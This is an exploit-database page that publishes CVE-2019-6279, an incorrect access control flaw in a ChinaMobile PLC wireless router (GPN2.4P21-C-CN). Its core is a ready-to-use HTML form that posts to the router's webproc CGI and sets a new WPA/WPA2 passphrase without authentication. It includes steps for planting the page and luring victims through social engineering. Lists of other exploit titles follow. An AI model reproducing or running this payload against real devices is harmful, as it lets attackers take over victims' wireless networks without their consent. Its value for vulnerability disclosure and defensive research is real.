Menu

Search for hundreds of thousands of exploits

"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control"

Author

Exploit author

"Kumar Saurav"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-03-20

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access
Control
# Date: 14/01/2019
# Exploit Author: Kumar Saurav
# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Windows
# CVE : CVE-2019-6279

#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with
firmware
W2001EN-00 have an Incorrect Access Control vulnerability via the
cgi-bin/webproc?getpage=html/index.html
subpage=wlsecurity URI, allowing an Attacker to change the Wireless
Security Password.

Reproduction Steps:
Step 1: Building a malicious html web page
Step 2: Attackers wants to change the wireless security (WPA/WPA2) key to
PSWDmatlo331#@!” (in my case)

Step 3: (192.168.59.254 in my Case)
<html>
<body>
<form method=POST action=http://192.168.59.254:80/cgi-bin/webproc >
<input type=text name=sessionid value=2a39a09e>
<input type=text name=language value=en_us>
<input type=text name=sys_UserName value=admin>
<input type=text name=var:menu value=setup>
<input type=text name=var:page value=wireless>
<input type=text name=var:subpage value=wlsecurity>
<input type=text name=var:errorpage value=wlsecurity>
<input type=text name=getpage value=html/index.html>
<input type=text name=errorpage value=html/index.html>
<input type=text name=var:arrayid value=0?>
<input type=text name=obj-action value=set>
<input type=text
name=:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType 
value=11i>
<input type=text
name=:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes
value=AESEncryption>
<input type=text
name=:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode
value=PSKAuthentication>
<input type=text
name=:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey
value=100?>
<input type=text
name=:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase
value=PSWDmatlo331#@!”>
<input type=text
name=:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression
value=KeyPassphrase>
<input type=submit value=Send>
</form>
</body>
</html>

Step 4: save this as Incorrect_Access_Control.html
Step 5: Planting this malicious web page (Incorrect_Access_Control.html)
that are likely to be visited by the victims (by social engineering) or
any user connected in the Access Point (AP) will have to visit this page or
any attackers connected in the AP will trigger this exploit.
Step 6: After execution of above exploit, wireless security (WPA/WPA2) key
will change!!

Note: This vulnerability allowing an attacker to reproduce without login.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control" webapps hardware "Kumar Saurav"
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery" webapps hardware "Kumar Saurav"
2019-01-07 "PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting" webapps cgi "Kumar Saurav" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected